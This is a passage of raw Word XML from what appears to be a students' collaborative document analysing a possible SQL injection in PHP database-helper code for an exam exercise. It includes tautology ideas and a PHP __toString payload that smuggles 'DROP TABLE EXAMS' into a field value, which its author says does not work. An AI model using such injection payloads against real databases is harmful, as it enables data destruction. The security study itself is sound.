        <w:t xml:space="preserve">Basically, my idea is that you need to make $conditions an array but with none of the default conditions. This means that that whatever is in the array will be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ORed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we could OR whatever </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement. Pls confirm or reject this hypothesis. </w:t>
      </w:r>
      <w:commentRangeEnd w:id="7"/>
      <w:r>
        <w:commentReference w:id="7"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="185B5403" w:rsidP="75FE2C14" w:rsidRDefault="185B5403" w14:paraId="4AE1C81D" w14:textId="37816C7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Any other suggestions?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44F3E913" w:rsidP="5A935770" w:rsidRDefault="44F3E913" w14:paraId="2FBD0FA4" w14:textId="2693CE30">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5A935770">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Anon3</w:t>
      </w:r>
      <w:r w:rsidRPr="5A935770" w:rsidR="22C2AC93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5A935770" w:rsidR="22C2AC93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Prab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5A935770" w:rsidR="22C2AC93">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="5A935770">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="5A935770" w:rsidR="03DFDFF4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you put “{{field}}” in $condition, _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5A935770" w:rsidR="03DFDFF4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>conditionHelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5A935770" w:rsidR="03DFDFF4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="5A935770" w:rsidR="03DFDFF4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) replaces it with the actual field, resulting in a ‘1’=’1’-like</w:t>
      </w:r>
      <w:r w:rsidRPr="5A935770" w:rsidR="184472B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> condition which is kind of SQL injection. This assumes that '{' and '}’ are not changed by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5A935770" w:rsidR="184472B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>quoteInto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5A935770" w:rsidR="184472B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="5A935770" w:rsidR="184472B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) though</w:t>
      </w:r>
      <w:r w:rsidRPr="5A935770" w:rsidR="40979F2F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, so it might be wrong (the examiner feedback suggests that many students marked a safe line as vulnerable probably because of assumptions about the code not shown in the file).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03CC2A3A" w:rsidP="133B6B4D" w:rsidRDefault="03CC2A3A" w14:paraId="224355DB" w14:textId="2B5BB38A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Wouldn't it cause it to become y = ‘y’, since it would be quoted to be {{field}} = ‘{{field}}’?</w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="7B04E71D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7066C207" w:rsidP="5A935770" w:rsidRDefault="2C7FF6CF" w14:paraId="5F64F5D1" w14:textId="2391D17E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Anon4: not sure if this counts, but we can get it all to evaluate to be true if $condition = array(array(‘null’), array(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>notnull</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>’))?,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> but idk if that counts as a proper injection, since </w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="2D5EC189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>we’re just making it all be true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="484CF3A5" w:rsidP="133B6B4D" w:rsidRDefault="2CBF701C" w14:paraId="3C280C8D" w14:textId="7F367C5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Anon5: Putting a value of unexpected type in $condition? (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> an anonymous function)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="730AA4C3" w:rsidP="61D57FC2" w:rsidRDefault="730AA4C3" w14:paraId="1BF66EDB" w14:textId="5E25C758">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="8"/>
      <w:commentRangeStart w:id="9"/>
      <w:commentRangeStart w:id="10"/>
      <w:commentRangeStart w:id="11"/>
      <w:commentRangeStart w:id="12"/>
      <w:commentRangeStart w:id="13"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Rayan: $x gets converted to a string at some point</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="6EADB52B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the cast towards the end of the main function)</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, maybe pass a class with an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>overriden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>)???? No idea what to do with this though</w:t>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p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="48169817" w14:textId="1391D3BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Maks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (based on the Rayan’s idea):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2B269031" w:rsidP="61D57FC2" w:rsidRDefault="2B269031" w14:paraId="7725F753" w14:textId="1AF7F0AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="24B8C96F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn’t work</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> unfortunately </w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>🙁</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see comments on the right)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="51A24A49" w14:textId="5F5AD27A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>$x = new class {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="0958621C" w14:textId="7B75D733">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    public function __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="2339CE47" w14:textId="56D74BD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">        global $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>field;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="2811DC2A" w14:textId="0A3B275C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">        $field = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>firstname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''; DROP TABLE EXAMS; -- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="3426D0C7" w14:textId="76A63C60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "none of your business</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="5C461FF3" w14:textId="045A0CD3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="59177E6B" w14:textId="17A624A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E8D1B7F" w:rsidP="61D57FC2" w:rsidRDefault="1E8D1B7F" w14:paraId="632931B2" w14:textId="40FFAA9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>When $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>prepareCondition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">‘y’, $x) is called, the following line should be called inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
